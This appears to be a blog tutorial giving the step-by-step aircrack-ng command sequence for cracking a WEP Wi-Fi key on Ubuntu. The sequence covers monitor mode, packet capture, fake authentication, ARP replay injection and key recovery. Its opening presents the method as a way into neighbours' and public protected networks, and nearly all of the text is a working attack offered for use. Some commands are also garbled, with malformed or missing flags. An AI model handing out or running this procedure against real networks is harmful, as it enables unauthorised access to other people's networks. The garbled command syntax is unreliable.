If you are in a public place and you cannot connect to a wireless networked because it's protected... If your neighbors have a Wi-Fi protected connection and you want to share it with them... If you have lost your Wi-Fi key and you want to recover it back... Here is a tutorial that will show you How to Crack Wireless Protected Access that uses WEP as Encryption using Ubuntu and without the need to use Backtrack.


Step 1 ( Installing Aircrack-ng )


Open new terminal and type :  sudo apt-get install aircrack-ng

and let it install the new commands of aircrack-ng.



Step 2 ( Listing and monitoring your Wi-Fi device)

Open a new terminal and type : sudo airmon-ng
It will lists your network devices like this:



Type again : sudo airmon-ng start wlan0
and replace "WLAN0" with your Wi-Fi adapter.

Step 3 ( Scanning and Collection Packets)

Type in the terminal : sudo airodump-ng mon0
It will scan all available Wi-Fi spots and will show like this:




Here we are going to Hack WEP Encryption, so we will hack the WiFi named "Ztuts"
PS: Hacking WPA or WPA2 PSK is not very easy but we will speak about it later.


Now type in the terminal : sudo airodump-ng --channel 9 mon0
Replace the channel with the WiFi's channel (in grey color)
It will keeps scanning and collecting data from WiFi that uses channel 9.

Let that window opened and don't close it.

Step 3 ( Sending Fake Authentication )

Open a new terminal and type : sudo aireplay-ng --fakeauth 0 -00:1B:11:6E:78:6D -e Ztuts mon0
 Replace 00:1B:11:6E:78:6D with the BSSID (Mac Address) of the WiFi.
 Replace "Ztuts" with the name of the WiFi

It will sends fake authentication to make sure the access point don't use mac filtering.

Step 4 ( Collecting and Saving Data Capture )

Open a new terminal and Type : sudo airodump-ng --channel 9 -w /home/razor/ztutswep -i mon0
Replace channel with the channel you used in step 2.
Replace the directory "/home/razor/ztutswep" with the directory you want to save the data. ( you can just type the name of the file : e.g : "crackwep" )

It will starts capturing data from the access point, but we need to speed up the capture of the packets:

Open a new terminal and type : sudo aireplay-ng -3 -b 00:1B:11:6E:78:6D  mon0
Replace 00:1B:11:6E:78:6D with the WiFi's Mac address.

Let everything work a little bit and you should receive ARP requests and the data will begin increasing fast.

Step 5 ( Cracking the Password )

If you have captured enough data ( varies with the security key) you have to crack it down:

Open a terminal and Type : sudo aircrack-ng -0 - 00:1B:11:6E:78:6D /home/razor/ztutswep-02.ivs
Replace the directory with the one used before.
If you have collected sufficient IVS (data) it will crack the key, if not it will stand for and wait until you collect many data.

Here is how it looks if it hacks the key:



Done Hacking Wireless Protected Access, and the Key is: RAZORTUTS